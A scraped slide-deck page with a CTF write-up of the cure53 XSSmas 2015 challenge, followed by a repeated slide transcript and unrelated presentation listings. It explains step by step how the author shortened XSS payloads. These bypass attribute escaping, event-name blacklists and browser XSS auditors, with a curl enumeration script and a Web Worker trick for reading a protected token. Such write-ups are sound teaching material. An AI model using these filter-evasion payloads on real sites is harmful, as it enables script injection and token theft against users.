A XSSmas carol by pepe vila
whoami
Name: Pepe Vila (@cgvwzq) == btoa("pepe").toLowerCase().replace(/[=+]/g,'')
Location: Spain
Work:
- before: pentester at EY
- current: PhD student at IMDEA Software
Interests:
- try to understand browsers, XSS challenges, CTFs, computationalism,
space exploration...
the challenge
shortcut!
Official Write-up:
https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015
Summary
● index.php: xss w/o UI on <div> element
● token.php: bypass document.location JS check
● index2.php: Angular JS template injection
● index3.php: xss w/o UI on <p> element
what we know?
Hints probably don’t help too much a priori. But after some trial and error we can learn:
- Browser anti-XSS (on IE, Chrome and Opera)
- token == sessionid => same token used everywhere
- index3.php checks token and Referer header
- requests to index.php and index3.php regenerate the sessionid
- we don’t need to include the .php extension
- paths after a valid resource are ignored on server side
(e.g.: http://domain/index/foobar/ == http://domain/index.php )
what we know?
- index.php reflects $_GET['xss'] in
<div class='<INJECTION>'>·–·</div>
…
<script src="token.php?token=<TOKEN>&callback=document.write"></script>
It uses htmlentities, but we can escape the attribute context with single quotes
- fortunately the <script> string is stripped, so we can bypass anti-XSS filters
what we know?
- index3.php checks the Referer header for the string “/index2.php” and for a valid token
- if ok, it reflects $_GET['xss'] in
<p class='<INJECTION>'></p>
again with htmlentities, so we escape the attribute context
- no stripping this time, but some blacklisted events are replaced by “onend”
- a CSS comment tells us to “get some ‘css’?” so we can also inject in a <style> context
ideas
<div contenteditable id=x onfocus=alert(1)></div> + target (all but FF)
vs.
<div onbeforescriptexecute=alert(1)><script></script></div> (only FF)
Firefox has no anti-XSS, but I couldn’t get execution on /index3.php :(
And… onanimationstop is translated into onanimationend,
which is a valid event :) and because of the replacement the
XSS Auditor does not match :D
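Added example (not part of the original slides): a JavaScript model of the two server-side weaknesses noted above, entity encoding that leaves single quotes alone inside a single-quoted attribute and a blacklist that rewrites event names to "onend", next to an encoder that also escapes single quotes. The blacklist contents, the function names and the sample value are constructed assumptions; the encoders model PHP's htmlentities() with ENT_COMPAT and with ENT_QUOTES.

```javascript
// Added example: a constructed model, not the challenge's real server code.

// Models PHP htmlentities() with ENT_COMPAT: & < > " are encoded, ' is not.
function encodeCompat(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;');
}

// Models ENT_QUOTES: the single quote is encoded as well.
function encodeAllQuotes(s) {
  return encodeCompat(s).replace(/'/g, '&#039;');
}

// ASSUMPTION: a short constructed blacklist. The slides only say that "some"
// event names are replaced by "onend".
const BLACKLIST = ['onfocus', 'onstop', 'oncut'];

// Substring replacement: every blacklisted name becomes "onend", wherever it
// occurs, including inside a longer attribute name.
function blacklistReplace(s) {
  return BLACKLIST.reduce(
    (out, name) => out.replace(new RegExp(name, 'gi'), 'onend'),
    s
  );
}

// Weak form: single-quoted attribute, quotes left unencoded, blacklist applied.
function renderWeak(value) {
  return `<p class='${blacklistReplace(encodeCompat(value))}'></p>`;
}

// Hardened form: every quote character is encoded, so the value cannot leave
// the attribute and no blacklist is needed.
function renderHardened(value) {
  return `<p class='${encodeAllQuotes(value)}'></p>`;
}

// Minimal attribute-name lister for the first tag in a string. Sufficient for
// this model because both encoders turn a raw ">" in the value into "&gt;".
function attributeNames(html) {
  const tag = /^<[a-z]+\s*([^>]*)>/i.exec(html);
  if (tag === null) return [];
  const names = [];
  const attr = /([^\s=]+)(?:=(?:'[^']*'|"[^"]*"|[^\s]*))?/g;
  let m;
  while ((m = attr.exec(tag[1])) !== null) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

// Event-handler attributes are the ones a reviewer or a test should flag.
function handlerAttributes(html) {
  return attributeNames(html).filter((n) => n.startsWith('on'));
}

// Constructed sample value with an inert handler body.
const SAMPLE = "a' onanimationcut='x";

console.log('weak     :', renderWeak(SAMPLE), handlerAttributes(renderWeak(SAMPLE)));
console.log('hardened :', renderHardened(SAMPLE), handlerAttributes(renderHardened(SAMPLE)));
```

The weak renderer ends up with an attribute the request never contained verbatim, which is why a filter that compares request and response text misses it.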
ideas
I also wrote a bash script to list all non-replaced events:
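#!/bin/bash
# Usage: pass the session token as $1; events.txt holds one event name per line.
TOKEN="$1"
for i in $(cat events.txt); do
  # Request index3 with the candidate event and keep only the reflections
  # where the name was not rewritten to "onend".
  curl -s -H "Cookie: PHPSESSID=${TOKEN}" -H "Referer: http://any/index2.php" \
    "https://xssmas2015.cure53.co.uk/index3?token=${TOKEN}&xss='${i}=alert(1)" |
    grep '<p class' | grep -v "'onend"
done
Which gave me some events to JSfiddle with: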
onafterscriptexecute,onariarequest,onautocomplete,onautocompleteerror,onbeforescriptexecute,onbeforeupdate,oncancel,onclose,
oncommand,oncompassneedscalibration,oncuechange,ondevicelight,ondevicemotion,ondeviceorientation,ondeviceproximity,ondurationend,
onfullscreenchange,onfullscreenerror,ongotpointercapture,onhashchange,oninput,onlanguagechange,onlostpointercapture,
onmozfullscreenchange,onmozfullscreenerror,onmozpointerlockchange,onmozpointerlockerror,onmscontentzoom,onmsfullscreenchange,
onmsfullscreenerror,onmsgesturechange,onmsgesturedoubletap,onmsgestureend,onmsgesturehold,onmsgesturestart,onmsgesturetap,
onmsgotpointercapture,onmsinertiastart,onmslostpointercapture,onmsmanipulationstatechanged,onmspointercancel,onmspointerdown,
onmspointerenter,onmspointerleave,onmspointermove,onmspointerout,onmspointerover,onmspointerup,onmssitemodejumplistitemremoved,
onmsthumbnailclick,onpage,onpointercancel,onpointerdown,onpointerenter,onpointerleave,onpointerlockchange,onpointerlockerror,
onpointermove,onpointerout,onpointerover,onpointerup,onpopstate,onratechange,onrowsdelete,onrowsinserted,onshow,ontoggle,
onuserproximity,onwebkitfullscreenchange,onwebkitfullscreenerror,onwebkittransitionend*,onwheel
my first solution
So in order to test the validity before starting the “shortening” contest, I submitted the following:
?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src.
substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name:
x+onanimationstop=alert(location)//index2.php `#x
189
document.all[xx].src is the shortest* way to the token string:
+ We save the “document” because it’s in the scope of any event.
+ @keyframes+x{ we don’t even need to close the curly bracket
- URL encoding is always ugly and expensive :S
* I also tried innerHTML (9) instead of all[xx].src (11), but no luck. (cookie is also HTTP only)
IDEA -> TEST & ERROR + REMEASURE
warm up...
?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3${all[56].src.slice(41)}%
26css=*{animation:x}@keyframes+x{%26xss=%2527onanimationstop=alert(URL)//index2.
php`#x
With some improvements…
+ tabindex=1 also makes elements focusable
+ we can reuse the ?token= part from all[xx].src + slice (5) vs. substr (6)
+ General animation CSS property instead of animation-name
+ Move style attribute inside the CSS context *{animation:x} (14) vs. style=animation:x+ (18)
+ URL with document in scope makes document.URL :)
161
But the rest of the guys were still ahead with ~150 bytes :(
warm up x 2
?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3/${all[56].src}%26css=*
{animation:x}@keyframes+x{%26xss=%2527onanimationcut=alert(URL)//index2.php `#x
And a couple more:
+ No need to slice the token’s URL if we set it as path (same resource requested):
/index3/http://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=document.write
equal to
/index3?token=<TOKEN>&callback=document.write
+ Shortest replaced event is oncut, so onanimationcut will become onanimationend :)
* I actually bruteforced all possible 2 char combinations, just in case… -_-’
151
that was me
reorder you must
?xss=’id=x+onfocus<script>= location=`index3/index2.php${all[56].src}%26css=*
{animation:x}@keyframesfx{%26xss=’onanimationcut=’alert(URL) `+tabindex=1#x
+ onfocus attribute doesn’t need quotes if we don’t break it with spaces
BONUS: we can avoid the double URL encoding for the single quote :D
+ instead of URL encoding the space on the keyframe we can do better with f
+ moving /index2.php saves us 1 slash (we change the other one for an opening single quote)
+ tabindex=1’foobartrashhere is the only attribute that still works without an opening single quote
146
JSFiddle results
I created an HTML element with ~200 events [1] and played with different attribute combinations and styles.
MDN, MSDN and similar are also very helpful.
I had previously found ontransitionend, but I just ignored it since it was longer than my current solution, so I even did a
tweet of it -_-’
However… At some point the ontransitionend event got fired without setting any CSS property WHY? :S
[1] http://pastebin.com/raw/WwcBmz5J
JSFiddle results
Focusable elements “grow” an outline-width when focused. So…
transition:1s
will trigger a transition when we focus any focusable element. And we already know how to do that.
+ We are reusing the style, id and tabindex properties as well as the location.hash !!
+ Next steps?
145
?xss=’onfocus<script>= location=`index3/index2.php${all[56].src}%26xss=’
onwebkittransitioncut=alert(URL)// ${URL}`+style=transition:1s+id=x+tabindex=1#x
‘onf$ck=’#asd!$@41
I ran out of ideas many times. Different solutions but all the same length, dead paths,
more dead paths…
I was trying to reuse more parts of the first injection (tried with replace, slice and
concatenation) but I couldn’t save too much :(
never gonna give you up
2paths1injection
New idea: I wrote to Mario asking if getting an alert(URL) in both injections was valid, and he said YES. So I basically broke the Twitter barrier :)
Using the same payload in both injections:
+ Note the extra “&” in order to concat the “xss” parameter
+ We need to put “oncut” at some place to cheat the anti-XSS.
+ The 0<script>1 will be syntactically correct but on the second page will throw a “not defined” exception.
+ XSS Auditor allows the stripped/replaced string to be in any place before “/” or “,”
?&xss=’style=transition:1s+id=x+tabindex=1+onwebkittransitionend=oncut=alert(URL)
||0<script>1,location=`index3/index2.php${all[56].src}${URL}`#x
139
2paths1injection
And saved some more bytes....
?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut:
0<script>1,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x
137
2paths1injection
And a few more...
This one is worth the creativity special prize :D
?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut:
location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x
134
But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So...
BACK TO 145 :(
my first shortest solution
Fortunately I was pretty sure that the idea could work, and after some more time in front of vim I got this:
141
?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=`<script>`-alert
(URL)//`,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x
Which in index.php was:
?&xss='style=transition:1s+id=x+onwebkittransitionend= oncut=``-alert(URL)//` ,
location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x
And in index3.php:
?&xss='style=transition:1s+id=x+onwebkittransitionend=onend= `<script>`-alert
(URL)//`,location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x
ONLY ONE ALERT
a little shorter
137
?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert
(URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x
+ In index.php the condition will be an empty string, so it will take the second path and redirect
+ In index3.php we take the first one and alert for the glory and fame! :D
This was on January 12th, and I could rest until @molnar_g did 136 a week
(a very long one indeed) before the end of contest.
JS strings 101
135
?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert
(URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x
Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed:
The winner vector
?&xss=/index2.php'style=transition:
1s+id=x+onwebkittransitionend=oncut=`<script>`?alert(URL):location=[/index3/,all
[58].src,URL]+tabindex=1#x
?&xss=/index2.php'style=transition:1s+id=x+onwebkittransitionend=location=oncut=
[`<script>`?alert(URL):/index3/,all[58].src,URL]+tabindex=1#x
Jontransition & Co.
A couple of days before the end of the contest this mysterious “guy” appeared in the scoreboard… ~.~
and @phiber told me that I was going to be defeated, driving me crazy.
So I started thinking again trying to split, slice, replace the innerHTML in order to save 1 byte more by
reusing the “transition” string from “Jontransition”.
But I couldn’t improve the vector that way, so I tried some other paths again...
more ideas
?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=location=
[`<script>index3/index2.php`, (all[60]||alert(URL)).src,URL]+tabindex=1#x
Alternative 135 solution.
?&xss='style=transition:1s+id=x+onwebkittransitionend= x.oncut-1?location=
[`<script>index3/index2.php`,all[60].src,URL] :alert(URL)+tabindex=1#x
I thought this idea could save me a couple of bytes, but at the end I couldn’t :( Anyway it is interesting (136):
+ oncut == null vs. onend == undefined
+ +null == 0 vs. +undefined == NaN ... oncut-1 == -1 == true vs. undefined-1 == NaN == false
the end
At the end Jontransition didn’t make it (or did he? ~.^), and after several days of having fun, learning
and suffering I was lucky enough to win :)
I hope I have not bored you too much, and that you have found at least something interesting...
Congrats to the rest of the winners :)
Also thanks to Mario, @mmrupp and @filedescriptor for organizing these contests and sharing their
knowledge.
questions?
bonus
token.php
+ Server-side checks for the Referer (not empty & different than “xssmas2015.cure53.co.uk”) and for a valid token.
+ Client-side check:
if (document.location.href == document.location.protocol + '//localhost' + location.pathname)
callback({foo:"thesecret"})
A Web Worker’s context allows us to set the document and location properties and then importScripts the file.
document={location:{href:'//localhost',protocol:''}};location={pathname:''};importScripts('https://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=postMessage')
So that should bypass the client-side check and get the token for index2.php, but...
+ Chrome does not send Referer on Web Worker’s requests from Blob URLs (we need an external file).
+ Chrome does not send cookies on cross-domain requests from a Web Worker either (B req. A), unless
the page B which created the Web Worker is loaded in an iframe of page A (dafuq :S is this in the spec?)

 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noidabntitsolutionsrishis
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 

Recently uploaded (20)

Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion Application
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Best Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfBest Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdf
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING  RIVER  WATER QUALITY  ppt presentationPREDICTING  RIVER  WATER QUALITY  ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentation
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 

A XSSmas carol

  • 1. A XSSmas carol by pepe vila
  • 2. whoami Name: Pepe Vila (@cgvwzq) Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
  • 3. whoami Name: Pepe Vila (@cgvwzq) == btoa("pepe").toLowerCase().replace(/[=+]/g,'') Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
  • 4. Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element the challenge
  • 5. the challenge shortcut! Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element
  • 6. what we know?
    Hints probably don’t help too much a priori. But after some trial and error we can learn:
    - Browser anti-XSS (on IE, Chrome and Opera)
    - token == sessionid => same token used everywhere
    - index3.php checks token and Referer header
    - requests to index.php and index3.php regenerate the sessionid
    - we don’t need to include the .php extension
    - paths after a valid resource are ignored on server side (e.g.: http://domain/index/foobar/ == http://domain/index.php )
  • 7. what we know?
    - index.php reflects $_GET['xss'] in
      <div class='<INJECTION>'>·–·</div>
      …
      <script src="token.php?token=<TOKEN>&callback=document.write"></script>
      It uses htmlentities, but we can escape the attribute context with single quotes
    - fortunately the <script> string is stripped, so we can bypass anti-XSS filters
  • 8. what we know?
    - index3.php checks Referer header (for the string “/index2.php”) and the token
    - if ok reflects $_GET['xss'] in <p class='<INJECTION>'></p>, again with htmlentities, so we escape attribute context
    - no stripping this time, but some blacklisted events are replaced by “onend”
    - a CSS comment tells us to “get some ‘css’?” so we can also inject in <style> context
  • 9. what we know?
    - index3.php checks Referer header for the string “/index2.php” and for a valid token
    - if ok reflects $_GET['xss'] in <p class='<INJECTION>'></p>, again with htmlentities, so we escape attribute context
    - no stripping this time, but some blacklisted events are replaced by “onend”
    - a CSS comment tells us to “get some ‘css’?” so we can also inject in <style> context
  • 10. ideas
    <div contenteditable id=x onfocus=alert(1)></div> + target (all but FF)
    vs.
    <div onbeforescriptexecute=alert(1)><script></script></div> (only FF)
    Firefox has no anti-XSS, but I couldn’t get execution on /index3.php :(
    And… onanimationstop is translated into onanimationend, which is a valid event :) and because of the replacement, XSS Auditor does not match :D
  • 11. ideas
    I also wrote a bash script to list all non-replaced events:

    #!/bin/bash
    # Usage: ./script.sh <TOKEN>   (events.txt holds one event name per line)
    TOKEN="$1"
    for i in $(cat events.txt); do
        # Request index3 with the expected cookie and Referer, inject the event name,
        # and keep only reflections that were not rewritten to "onend".
        curl -s -H "Cookie: PHPSESSID=${TOKEN}" -H "Referer: http://any/index2.php" \
            "https://xssmas2015.cure53.co.uk/index3?token=${TOKEN}&xss='${i}=alert(1)" |
            grep '<p class' | grep -v "'onend"
    done

    Which gave me some events to JSfiddle with:
    onafterscriptexecute,onariarequest,onautocomplete,onautocompleteerror,onbeforescriptexecute,onbeforeupdate,oncancel,onclose,
    oncommand,oncompassneedscalibration,oncuechange,ondevicelight,ondevicemotion,ondeviceorientation,ondeviceproximity,ondurationend,
    onfullscreenchange,onfullscreenerror,ongotpointercapture,onhashchange,oninput,onlanguagechange,onlostpointercapture,
    onmozfullscreenchange,onmozfullscreenerror,onmozpointerlockchange,onmozpointerlockerror,onmscontentzoom,onmsfullscreenchange,
    onmsfullscreenerror,onmsgesturechange,onmsgesturedoubletap,onmsgestureend,onmsgesturehold,onmsgesturestart,onmsgesturetap,
    onmsgotpointercapture,onmsinertiastart,onmslostpointercapture,onmsmanipulationstatechanged,onmspointercancel,onmspointerdown,
    onmspointerenter,onmspointerleave,onmspointermove,onmspointerout,onmspointerover,onmspointerup,onmssitemodejumplistitemremoved,
    onmsthumbnailclick,onpage,onpointercancel,onpointerdown,onpointerenter,onpointerleave,onpointerlockchange,onpointerlockerror,
    onpointermove,onpointerout,onpointerover,onpointerup,onpopstate,onratechange,onrowsdelete,onrowsinserted,onshow,ontoggle,
    onuserproximity,onwebkitfullscreenchange,onwebkitfullscreenerror, onwebkittransitionend* ,onwheel
  • 12. my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. (cookie is also HTTP only)
  • 13. my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. IDEA -> TEST & ERROR + REMEASURE 189
  • 14. warm up... ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3${all[56].src.slice(41)}% 26css=*{animation:x}@keyframes+x{%26xss=%2527onanimationstop=alert(URL)//index2. php`#x With some improvements… + tabindex=1 also makes elements focusable + we can reuse the ?token= part from all[xx].src + slice (5) vs. substr (6) + General animation CSS property instead of animation-name + Move style attribute inside the CSS context *{animation:x} (14) vs. style=animation:x+ (18) + URL with document in scope makes document.URL :) 161 But the rest of the guys still ahead with ~150 bytes :(
  • 15. warm up x 2
    ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3/${all[56].src}%26css=* {animation:x}@keyframes+x{%26xss=%2527onanimationcut=alert(URL)//index2.php `#x
    And a couple more
    + No need to slice the token’s URL if we set it as path (same resource requested):
      /index3/http://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=document.write
      equal to
      /index3?token=<TOKEN>&callback=document.write
    + Shortest replaced event is oncut, so onanimationcut will become onanimationend :)
    * I actually bruteforced all possible 2 char combinations, just in case… -_-’
    151
  • 17. reorder you must ?xss=’id=x+onfocus<script>= location=`index3/index2.php${all[56].src}%26css=* {animation:x}@keyframesfx{%26xss=’onanimationcut=’alert(URL) `+tabindex=1#x + onfocus attribute doesn’t need quotes if we don’t break it with spaces BONUS: we can avoid the double URL encoding for the single quote :D + instead of URL encoding the space on the keyframe we can do better with f + moving /index2.php saves us 1 slash (we change the other one for an opening single quote) + tabindex=1’foobartrashhere is the only attribute that still works without an opening single quote 146
  • 18. JSFiddle results
    I created an HTML element with ~200 events [1] and played with different attribute combinations and styles. MDN, MSDN and similar references are also very helpful.
    I had previously found ontransitionend, but I just ignored it since it was longer than my current solution, so I even tweeted it -_-’
    However… At some point the ontransitionend event got fired without setting any CSS property. WHY? :S
    [1] http://pastebin.com/raw/WwcBmz5J
  • 19. JSFiddle results
    Focusable elements “grow” an outline-width when focused. So… transition:1s will trigger a transition when we focus any focusable element. And we already know how to do that.
    + We are reusing the style, id and tabindex properties as well as the location.hash !!
    + Next steps?
    145
    ?xss=’onfocus<script>= location=`index3/index2.php${all[56].src}%26xss=’ onwebkittransitioncut=alert(URL)// ${URL}`+style=transition:1s+id=x+tabindex=1#x
  • 20. ‘onf$ck=’#asd!$@41 I ran out of ideas many times. Different solutions but all the same length, dead paths, more dead paths… I was trying to reuse more parts of the first injection (tried with replace, slice and concatenation) but I couldn’t save too much :(
  • 22. 2paths1injection
    New idea: I wrote to Mario asking if getting an alert(URL) in both injections was valid, and he said YES. So I basically broke the Twitter barrier :)
    Using the same payload in both injections:
    + Note the extra “&” in order to concat the “xss” parameter
    + We need to put “oncut” at some place to cheat the anti-XSS.
    + The 0<script>1 will be syntactically correct but on the second page will throw a “not defined” exception.
    + XSS Auditor allows the stripped/replaced string to be in any place before “/” or “,”
    ?&xss=’style=transition:1s+id=x+tabindex=1+onwebkittransitionend=oncut=alert(URL) ||0<script>1,location=`index3/index2.php${all[56].src}${URL}`#x
    139
  • 23. 2paths1injection And saved some more bytes.... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: 0<script>1,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x 137
  • 24. 2paths1injection And a few more... This one is worth the creativity special prize :D ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
  • 25. 2paths1injection And a few more... This one is worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
  • 26. 2paths1injection And a few more... This one is worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... BACK TO 145 :( ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 145
  • 27. my first shortest solution Fortunately I was pretty sure that the idea could work, and after some more time in front of vim I got this: 141 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=`<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x What in index.php was: ?&xss='style=transition:1s+id=x+onwebkittransitionend= oncut=``-alert(URL)//` , location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x And in index3.php: ?&xss='style=transition:1s+id=x+onwebkittransitionend=onend= `<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x ONLY ONE ALERT
  • 28. a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D
  • 29. a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D This was on January 12th, and I could rest until @molnar_g did 136 a week (a very long one indeed) before the end of contest.
  • 30. JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: The winner vector
